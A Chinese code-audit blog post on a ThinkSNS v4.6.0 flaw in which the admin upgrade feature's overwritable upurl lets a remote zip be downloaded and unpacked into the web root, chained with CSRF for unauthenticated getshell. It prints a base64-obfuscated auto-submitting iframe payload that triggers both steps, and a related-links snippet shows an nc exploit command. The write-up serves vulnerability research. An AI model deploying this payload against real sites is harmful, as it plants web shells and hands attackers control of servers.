代码审计之ThinkSNS v4.6.0最新版前台getshell
对于一个后台的至getshell的漏洞点,若需要当作前台来利用,最直接的idea会想到什么?当然是XSS、CSRF了,这已经不是什么新鲜话题或trick了,较早的wordpress 前台XSS之Getshell、最近安全客也有人发过zzzphp1.6前台的Getshell方式使用类似的方法。所以笔者对ThinkSNS审计的后台漏洞分析及其利用同样结合CSRF进行。
漏洞类型
通用漏洞
简介
后台升级存在逻辑错误与变量覆盖未验证升级链接参数upurl导致可升级远程下载shell结合后台csrf漏洞可导致攻击人员在前台发表payload链接即可getshell 。
漏洞分析
漏洞代码发生在路径ts4/apps/admin/lib/Action/UpgradeAction.class.php
文件。
46行处,升级时调用check函数升级通过C('UPURL').'?v='.C('VERSION')
获取升级链接
在169行,直接再次调用且upurl可控,覆盖之前的&upurl远程升级下载包含.php的test.zip压缩包先下载再校验,存在逻辑问题,直接构造url payload下载。此为漏洞的引发起始点,再往下看在226行处step2,Step2解压也存在问题未进行校验文件就进行解压到网站根目录
复现
1.直接在后台Getshell
1)根据对漏洞的定位,直接构造step1步的触发链接payload如下图所示
即可通过升级的step1远程下载shell压缩文件。
2)根据step2定位的漏洞点继续构造触发解压的payload如下图所示:
Step2
解压也存在问题未进行校验文件就进行解压到网站根目录
3)解压成功,shell.php被解压下载解压到了WWW\ts4\test目录
4)getshell
2. 后台Gethsell组合后台CSRF(无需登陆管理员前台getshell)
结合step1和step2构造一个CSRF getshell payload页面 html
<html> <body> <iframe src="data:text/html;base64,PGZvcm0gYWN0aW9uPSJodHRwOi8vMTkyLjE2OC4xMC4xMDYvdHM0L2luZGV4LnBocCI+CiAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImFwcCIgdmFsdWU9ImFkbWluIiAvPgogICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJtb2QiIHZhbHVlPSJVcGdyYWRlIiAvPgogICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhY3QiIHZhbHVlPSJzdGVwMSIgLz4KICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXB1cmwiIHZhbHVlPSJodHRwOi8vMTI3LjAuMC4xL3NoZWxsLnppcCIgLz4KICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlN1Ym1pdCByZXF1ZXN0IiAvPgogICAgPC9mb3JtPgo8Zm9ybSBhY3Rpb249Imh0dHA6Ly8xOTIuMTY4LjEwLjEwNi90czQvaW5kZXgucGhwIj4KICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYXBwIiB2YWx1ZT0iYWRtaW4iIC8+CiAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im1vZCIgdmFsdWU9IlVwZ3JhZGUiIC8+CiAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImFjdCIgdmFsdWU9InN0ZXAyIiAvPgogICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmaWxlbmFtZSIgdmFsdWU9InNoZWxsJiM0Njt6aXAiIC8+CiAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJTdWJtaXQgcmVxdWVzdCIgLz4KICAgIDwvZm9ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOzwvc2NyaXB0PjxzY3JpcHQ+ZG9jdW1lbnQuZm9ybXNbMF0uc3VibWl0KCk7PC9zY3JpcHQ+"></body> </html>
用户在前端留言处发表连接留言管理员点击查看getshell当点击时执行step1和step2已在不知情的情况下执行了载shell和加压shell.zip两步
成功下载shell
被解压
相关文章
- Multipart/form-data是文件上传或数据提交时会用到了,在php中Multipart/form-data是有安全bug的,下面我们来看看如何修复Multipart/form-data的bug吧. 今天在乌云...2016-11-25
- 苹果发布补丁修复了三个正被攻击者利用窃取用户敏感信息的高危漏洞,攻击者安装的间谍软件能窃取包括微信在内的应用信息。移动安全公司 Lookout 和加拿大多伦多大学公民实验室的研究人员合作发现了被命名为 Pegasus 的间谍软件。...2016-08-27
- 这篇文章主要介绍了详解各种PHP函数漏洞,对漏洞感兴趣的同学,可以参考下...2021-04-21
- 这篇文章主要介绍了php5系列的apache远程执行漏洞攻击脚本,需要的朋友可以参考下...2020-04-25
- 本文是对近期mysql报出的漏洞情况进行了简单的说明以及漏洞的修复措施分享,有需要的小伙伴一定要关注下...2016-10-02
- 近日,有国外安全专家发现了一个“史上最严重移动通信安全漏洞”。...2016-08-27
- 1:传漏洞利用的原理只是针对form格式上传的asp和php脚本*** nc(netcat) 用于提交数据包 dos界面下运行: nc -vv www.***.com 80<1.txt -vv:...2016-11-25
- 这篇文章主要介绍了Python网络安全格式字符串漏洞任意地址覆盖大数字的示例详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步...2021-10-14
- 这篇文章主要介绍了php安全攻防如何利用文件上传漏洞与绕过技巧详解,有需要的朋友可以参考借鉴下,希望大家多多进步早日升职加薪...2021-10-15
- 这篇文章主要为大家详细介绍了PHP序列化对象注入漏洞分析,PHP序列化对象注入漏洞的利用,感兴趣的小伙伴们可以参考一下...2016-04-20
- 滥用include 1.漏洞原因: Include是编写PHP网站中最常用的函数,并且支持相对路径。有很多PHP脚本直接把某输入变量作为Include的参数,造成任意引用脚本、绝...2016-11-25
PHP Advanced Transfer Manager多个漏洞
信息提供: 安全公告(或线索)提供热线:51cto.editor@gmail.com 漏洞类别: 输入确认漏洞 攻击类型: 远程攻击 发布日期: 2005-09-20 更新日期: 2005-09-20 受影响系统: PHP...2016-11-25- 本文作者:SuperHei 文章性质:原创 发布日期:2005-08-14 程序描叙 OKPHP是由www.okphp.com开发一套专业的网站管理系统,目前产品包括:Okphp CMS, Okphp BBS,Okphp BLOG。...2016-11-25
- 这篇文章主要介绍了PHP网站常见安全漏洞,及相应防范措施总结,文中相关措施讲解的很清晰,有感兴趣的同学可以学习下...2021-03-01
- 漏洞众测平台 HackerOne 显示,任天堂近日在该网站挂上了一个漏洞悬赏任务,悬赏“白帽黑客”检测 3DS 游戏系统相关漏洞。据 HackerOne 规则,任天堂评估漏洞及解决方案后,会为提交漏洞的用户给出 100 到 2 万美元不等的报酬。...2016-12-15
- 本文给大家介绍php常见漏洞攻击相关知识,本文介绍的非常详细,具有参考借鉴价值,感兴趣的朋友一起学习吧...2016-02-23
- 只要一个文件有(.asp)后面再带上分号(;)后面再带上一个随意字符加上扩展名如(cao.asp;ca.jpg)这个文件Windows会当成jpg图像文件,但是这种文件在IIS中会被当成asp运行...2016-01-27
- 这篇文章主要介绍了验证码的三个常见漏洞和修复方法,本文讲解了把验证码存储在Cookie中、没有进行非空判断、没有及时销毁验证码三个常见问题和解决方法,需要的朋友可以参考下...2020-06-25
- 9月7日消息,据ZDNet报道,在8月份的Def Con黑客大会上,曾有研究人员宣称发现名为Quadrooter的安全漏洞,9亿多部安卓手机可能受影响。谷歌于周二发布最新安全升级,宣布终于修复了所有安全漏洞。...2016-09-12
ASP.NET笔记之Session、http、web开发原则、xss漏洞的详细介绍
本篇文章小编为大家介绍,ASP.NET笔记之Session、http、web开发原则、xss漏洞详细。需要的朋友参考下...2021-09-22